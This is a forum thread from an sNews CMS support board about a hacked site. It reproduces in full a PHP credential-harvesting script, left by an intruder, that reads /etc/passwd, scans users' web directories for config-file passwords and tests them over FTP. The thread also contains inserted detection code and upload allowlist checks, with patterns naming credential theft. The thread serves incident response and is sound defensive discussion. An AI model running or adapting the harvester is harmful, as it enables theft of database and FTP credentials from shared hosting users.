Author Topic: Site hacked and phpconfigspy file left (sNews 1.5)  (Read 10060 times)

benjer

  • Newbie
  • *
  • Karma: 0
  • Posts: 20
Site hacked and phpconfigspy file left (sNews 1.5)
« on: March 04, 2008, 03:56:27 pm »

hey,

It's been a while since I posted in here. I did a site a while back using sNews 1.5, I think.
I had an issue recently where the hosting company changed/disabled mysql_pconnect; I changed that to use mysql_connect and it seemed fine.

However today http://www.swcp.co.uk is now showing an error:

Warning: main(snews.php) [function.main]: failed to open stream: No such file or directory in /home/swcpweb/public_html/index.php on line 2

Have checked and in fact the file is missing!

There is also a file called news.php which, from what I can tell, is something called phpconfigspy - I'll post the contents - hope that's ok....

Just wondering where I should go from here. I have a backup at home, but what's the best way of stopping this happening in the future, and should I be checking the database for any odd data/backdoors?

I'm surprised that they managed to upload and remove a file.

Any help/tips gratefully received.

thanks

ben
« Last Edit: March 05, 2009, 04:30:21 am by Joost »

benjer

  • Newbie
  • *
  • Karma: 0
  • Posts: 20
Re: Site hacked and phpconfigspy file left
« Reply #1 on: March 04, 2008, 03:57:41 pm »

Question - should I post the phpconfigspy file here, or does that in fact help spread this kind of *crap*?

eriknorum

  • Jr. Member
  • **
  • Karma: 2
  • Posts: 78
Re: Site hacked and phpconfigspy file left
« Reply #2 on: March 04, 2008, 04:52:23 pm »

I don't think posting the code here could do any harm. There are indeed some exploits for sNews 1.5, see link http://www.google.se/search?q=snews+1.5+exploit&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:sv-SE:official&client=firefox-a
I guess upgrading would solve the hacking problem :)

Joost

  • Guest
Re: Site hacked and phpconfigspy file left
« Reply #3 on: March 04, 2008, 04:56:18 pm »

Yes, post it. We can always decide to remove it later. I am interested.

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6020
  • Semantically Challenged
    • snews.ca
Re: Site hacked and phpconfigspy file left
« Reply #4 on: March 04, 2008, 05:45:25 pm »

Question - should I post the phpconfigspy file here, or does that in fact help spread this kind of *crap*?
Yes, as Joost noted... please post it so we can have a look at it. It might help us learn what this hacker was up to.
NOTE... If your site installation was using sNews 1.5.30... that's why the invader succeeded. We identified and patched this vulnerability rather quickly once it was discovered... with the release of 1.5.31. However... the best advice would be to upgrade your site by replacing the snews.php file with the 1.6 version... and making the change to the settings table in the database... which uses the MD5 hash for both the username and password (which 1.5.30 did not).
Do it now... later may not come.
-------------------------------------------------------------------------------------------------
sNews 1.6 MESU | sNews 1.6 MEMU

benjer

  • Newbie
  • *
  • Karma: 0
  • Posts: 20
Re: Site hacked and phpconfigspy file left
« Reply #5 on: March 04, 2008, 08:05:19 pm »

Code:
<?php
/*
Brainfuck
Edited by Braindrain
(c) http://p-range.info
*/
echo '<html><head><title>Brainfuck</title></head><body>';
(
$sm ini_get('safe_mode') == 0) ? $sm 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd fopen('/etc/passwd','r');
if (!
$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i 0;
while(!
feof($passwd))
{
$str fgets($passwd);
if ($i 35)
{
$pos strpos($str,':');
$username substr($str,0,$pos);
$dirz '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
  
}
$i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo 
"[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo 
"[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo 
"[~] Searching for passwords in config files...\n\n";
foreach (
$users as $user)
{
$path "/home/$user/public_html/";
read_dir($path,$user);
}
echo 
"\n[+] Done\n";
function 
read_dir($path,$username)
{
if ($handle opendir($path))
{
while (false !== ($file readdir($handle)))
{
$fpath "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
                         if (
                         
($file=='config.php')
                         or (
$file=='config.inc.php')
                         or (
$file=='conf.php')
                         or (
$file=='settings.php')
                         or (
$file=='configuration.php')
             or ($file=='wp_config.php')
             or ($file=='wp-config.php')
           or ($file=='inc.php')
                         or (
$file=='setup.php')
                         or (
$file=='dbconf.php')
                         or (
$file=='dbconfig.php')
                         or (
$file=='db.inc.php')
                         or (
$file=='dbconnect.php')
                         or (
$file=='connect.php')
                         or (
$file=='common.php')
                         or (
$file=='config_global.php')
                         or (
$file=='db.php')
                         or (
$file=='connect.inc.php')
                         or (
$file=='dbconnect.inc.php'))
                        {
$pass get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function 
get_pass($link)
{
@$config fopen($link,'r');
while(!feof($config))
{
$line fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass str_replace("]=\"","",$pass);
}

else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass str_replace("]='","",$pass);
return $pass[2];
}
}
}
function 
ftp_check($login,$pass)
{
@$ftp ftp_connect('127.0.0.1');
if ($ftp)
{
@$res ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass."  Success !\n";
}
else ftp_quit($ftp);
}
}
echo 
'</textarea><br><br>Coded by <b>$re@m3r</b> & <b>p-range</b>  <a href=http://p-range.info>p-range.info</a></body></html>';
?>

benjer

  • Newbie
  • *
  • Karma: 0
  • Posts: 20
Re: Site hacked and phpconfigspy file left
« Reply #6 on: March 04, 2008, 08:09:34 pm »

Actually I'm using sNews 1.4 and I made a fair few custom changes to it, so an easy upgrade is not really possible :(

I'm guessing that changing the include name from sNews to something random is a start, but will have to check the rest of the code for any vulns.

Luckily there are some very good internal tools at work (Yahoo), so I might run it through those - we even have an XSS checker written by Rasmus, so that could be interesting. I'm a front-end web dev, hence my small knowledge in this area.




Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6020
  • Semantically Challenged
    • snews.ca
Re: Site hacked and phpconfigspy file left
« Reply #7 on: March 04, 2008, 10:00:49 pm »

Thanks for posting the file, Benjer. It is basically designed to search for a range of possible file-names where a username and password might be stored... and if one of those files exists... the script then searches the file(s) for username & password variables or actual text by those names... and if the file-name isn't in the search array it checks any other existing file that may be in the root directory for the same stuff. It also tries to locate other things too. It's a fairly generic hack tool... so I'd imagine "brainf--k" is not an experienced hack-dork yet. Chances are he/she is in the learning phase... and yours was easy to crack.

The old 1.4 version has the username and password hard-coded into the snews.php file. In 1.5.30, the username and password were moved into a new (4th) settings table in the dbase along with some other site-wide settings. This was still vulnerable because the username was not hashed while the password was. From 1.5.31 on... both are hashed... and we haven't had hack invasions reported since. That's not to say that there isn't someone out there trying to get into 1.6... there most likely is.

There is no way to make your username and password absolutely 100% secure and non-retrievable. But there are ways to make it more difficult. The first is not using "login" as the path to your login panel. There are ways of making this obscure and unique... so that hackers won't find it using a sequential search function. I suggest it's time to move up to 1.6... re-do your mods... and take a look in the 1.6 Mods section for some extra notes on using a different login panel name.
« Last Edit: March 04, 2008, 10:04:04 pm by Keyrocks »
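An incident-response check added here for the situation Benjer describes (this is not code from the thread or from sNews): it hashes the webroot against a manifest taken from a clean backup to find deleted or altered files such as snews.php, and flags PHP files that combine several of the harvester's tell-tale calls (reading /etc/passwd, walking /home/*/public_html, matching config file names, ftp_login). The manifest format, the indicator regexes and the sample files built in demo() are my own assumptions.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Tell-tale features of the config-harvester posted above: it reads /etc/passwd,
# walks /home/<user>/public_html, matches config file names and calls ftp_login().
INDICATORS = {
    "passwd": re.compile(r"/etc/passwd"),
    "homewalk": re.compile(r"/home/.{0,40}public_html"),
    "confnames": re.compile(r"config(?:\.inc)?\.php|wp-config\.php|dbconf(?:ig)?\.php"),
    "ftp_login": re.compile(r"\bftp_login\s*\("),
}
MIN_HITS = 3  # flag only when several indicators co-occur, to limit false positives

def php_indicators(path):
    """Sorted names of the harvester indicators found in one PHP file."""
    text = Path(path).read_bytes()[:512 * 1024].decode("utf-8", "replace")
    return sorted(k for k, rx in INDICATORS.items() if rx.search(text))

def scan_webroot(root, manifest):
    """Compare a webroot with {relpath: sha256} taken from a clean backup: report
    missing and modified known files, unknown PHP files, and heuristic hits."""
    report = {"missing": [], "modified": [], "unknown_php": [], "suspicious": {}}
    seen = set()
    for full in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = full.relative_to(root).as_posix()
        seen.add(rel)
        digest = hashlib.sha256(full.read_bytes()).hexdigest()
        if rel in manifest and manifest[rel] != digest:
            report["modified"].append(rel)
        if full.suffix.lower() == ".php":
            if rel not in manifest:
                report["unknown_php"].append(rel)
            if len(hits := php_indicators(full)) >= MIN_HITS:
                report["suspicious"][rel] = hits
    report["missing"] = sorted(set(manifest) - seen)
    return report

def demo():
    """Constructed sample (assumed, not the thread's script): snews.php deleted, news.php dropped."""
    root = Path(tempfile.mkdtemp())
    index = b"<?php include('snews.php'); ?>"
    manifest = {"index.php": hashlib.sha256(index).hexdigest(), "snews.php": "0" * 64}
    (root / "index.php").write_bytes(index)
    (root / "news.php").write_text("<?php $p = fopen('/etc/passwd','r'); $d = '/home/'.$u.'/public_html/';"
                                   " if ($f == 'config.php') { ftp_login($c, $u, $pw); } ?>")
    return scan_webroot(str(root), manifest)
```

Run it against the real webroot with a manifest generated from the backup; the heuristic is a triage aid, so review every hit by hand before deleting anything.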

funlw65

  • Hero Member
  • *****
  • Karma: 96
  • Posts: 771
    • Country Lab
Re: Site hacked and phpconfigspy file left
« Reply #8 on: March 19, 2008, 09:02:44 pm »

So, always safe_mode = on is better?

Joost

  • Guest
Re: Site hacked and phpconfigspy file left
« Reply #9 on: March 20, 2008, 03:22:33 am »

So, always safe_mode = on is better?

safe_mode works for PHP only and has some nasty side effects. It is therefore not a great security measure.

funlw65

  • Hero Member
  • *****
  • Karma: 96
  • Posts: 771
    • Country Lab
Re: Site hacked and phpconfigspy file left
« Reply #10 on: March 22, 2008, 09:53:15 am »

Maybe another good solution is to permit uploading (with sNews) only txt,pdf,doc and images.

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6020
  • Semantically Challenged
    • snews.ca
Re: Site hacked and phpconfigspy file left
« Reply #11 on: March 22, 2008, 03:59:42 pm »

Maybe another good solution is to permit uploading (with sNews) only txt,pdf,doc and images.

This is correct... if the hacker was able to get logged in and had access to the Files panel and used it to upload his/her malicious file.
In sNews 1.6... locate these strings near the bottom of your language variables array in snews.php. By default, all of the file-types in the value side of the strings are "Allowed". These are really important configuration variables, and anyone using the ME, MESU or MEMU packages will notice that they have been removed from the language variable array and added to a new array in a separate configuration file.

Remove anything you don't need or want to be uploaded and it will no longer be available or allowed.

Code:
<?php

$l['file_include_extensions'] = 'php,txt,inc,htm,html'; // list of file types available for inclusion routine
$l['allowed_files'] = 'php,htm,html,txt,inc,css,js,swf'; // list of file types available for upload/file list routine
$l['allowed_images'] = 'gif,jpg,jpeg,png'; // list of image types available for upload/file list routine
$l['ignored_items'] = '.,..,cgi-bin,.htaccess,Thumbs.db,snews.php,index.php,style.css'; // list of files&folders ignored by upload/file list routine

?>

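An added Python model of the allowlist check those variables drive (my own assumption of how such a check should behave, not sNews's upload code): it parses $l['allowed_files'] and $l['allowed_images'] lines and tests upload names against the quoted 1.6 defaults and a trimmed list, covering the last-extension, letter-case and dotfile edge cases.

```python
import re

# Parse the $l['allowed_files'] / $l['allowed_images'] assignments of an
# sNews-style language array into one set of lower-case extensions.
ASSIGN = re.compile(r"\$l\['(allowed_files|allowed_images)'\]\s*=\s*'([^']*)'\s*;")

def parse_allowed(config_text):
    allowed = set()
    for _key, value in ASSIGN.findall(config_text):
        allowed.update(e.strip().lower() for e in value.split(",") if e.strip())
    return allowed

def upload_allowed(filename, allowed):
    """Allowlist on the final extension only: 'a.jpg.php' counts as .php, case is
    ignored, and names with no extension or a trailing dot (e.g. .htaccess, 'x.php.')
    are refused rather than guessed at."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path component
    if name.endswith(".") or "." not in name.lstrip("."):
        return False
    return name.rsplit(".", 1)[1].lower() in allowed

# Constructed config snippets: the 1.6 defaults quoted above, and a trimmed list
# along the lines funlw65 suggested (script-capable types removed).
DEFAULT_CONFIG = """
$l['allowed_files'] = 'php,htm,html,txt,inc,css,js,swf'; // upload/file list routine
$l['allowed_images'] = 'gif,jpg,jpeg,png'; // image types
"""
HARDENED_CONFIG = """
$l['allowed_files'] = 'txt,pdf,doc';
$l['allowed_images'] = 'gif,jpg,jpeg,png';
"""

def check_both(filename):
    """(allowed under defaults, allowed under the trimmed list) for one upload name."""
    return (upload_allowed(filename, parse_allowed(DEFAULT_CONFIG)),
            upload_allowed(filename, parse_allowed(HARDENED_CONFIG)))
```

With the defaults, check_both("shell.php") and check_both("image.jpg.php") both come back allowed, which is exactly why the php entry is worth removing.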

funlw65

  • Hero Member
  • *****
  • Karma: 96
  • Posts: 771
    • Country Lab
Re: Site hacked and phpconfigspy file left
« Reply #12 on: March 22, 2008, 08:14:53 pm »

Thank you Keyrocks.

centered

  • Guest
Re: Site hacked and phpconfigspy file left
« Reply #13 on: March 24, 2008, 06:48:37 pm »

What is troubling is that it was hacked with 1.4. I don't recall default 1.4 using any of the username or password variables in that script....

Also the imgs folder is chmodded to 777, unless it is changed...

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6020
  • Semantically Challenged
    • snews.ca
Re: Site hacked and phpconfigspy file left
« Reply #14 on: March 24, 2008, 09:00:24 pm »

What is troubling is that it was hacked with 1.4. I don't recall default 1.4 using any of the username or password variables in that script....
Also the imgs folder is chmodded to 777, unless it is changed...

Benjer noted that he had a "fair few custom changes" made to his 1.4 package and wasn't too keen on upgrading to 1.6. He may (though he didn't say) have added the Bulk Files Uploader (one of my mods) to his site, and that would have let a hacker upload a PHP file if restrictions weren't enabled to stop PHP files. But... we're only guessing at this point. Best to upgrade anyway. :)